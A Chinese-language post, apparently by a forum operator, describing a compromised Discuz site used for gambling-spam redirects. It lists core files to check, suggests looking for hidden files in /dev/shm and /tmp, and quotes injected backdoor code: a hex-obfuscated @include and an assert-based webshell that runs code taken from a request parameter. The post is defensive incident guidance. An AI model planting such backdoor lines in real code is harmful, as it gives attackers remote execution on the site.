discuz 被入侵後，最可能被修改的文件

最近發現站點被黑了，如今還不知道是由系統漏洞致使的系統帳戶被攻陷，仍是程序漏洞，文件被篡改。有一些敏感關鍵詞（例如：賭博，電子路單）被惡意指向，點擊搜索結果自動跳轉到其餘站點，並且是大量的，經過搜索「site:xxx.com 賭博」，會發現一大堆。該目的是爲該站點導流量，還有傳遞權重。

爲了防止暴露，入侵者會把被篡改的文件時間戳保持不變，因此經過修改時間是發現不到可疑文件的

如今解決辦法只限於，查找程序源碼，一個一個文件對比最初的文件，最後發現有兩個文件最重要，以下：

1. source/function/function_core.php
2. uc_server/control/admin/user.php
3. source/class/discuz/discuz_admincp.php
4. source/class/discuz/discuz_application.php

由於這四個文件，function_core.php是是核心函數庫全部頁面都會包含；user.php是ucenter後臺登錄，discuz_admincp.php是discuz管理中心用戶登陸，均可以得到管理員帳號和密碼；discuz_application.php是整個discuz初始化的核心類文件，初始化加載。

遇到相同問題的朋友，請首先查看這幾個文件是否被修改。

 

入侵方式一：通常會在全局文件中include一個外部的文件，例如：

@include('/dev/shm/.../tmp');

@include(PACK('H*','2f746d702f2e612f636c69656e742e706870'));

 

入侵方式二：

植入代碼，能夠執行外部傳入的代碼，例如：@array_map("ass\x65rt",(array)@$_REQUEST['ADMINCPS']);

ass\x65rt 其實就是 「assert」。

 

根據上面的線索，在下面的地方應該能夠發現一些有惡意代碼的文件，通常是惡意搜索引擎

• 系統的虛擬內存是否有東西，ls -a /dev/shm/ 例如：三個點的... 的隱藏文件
• ls -a /tmp  這個也要注意

 

 

順便舉報一些黑站：

• mujj.wang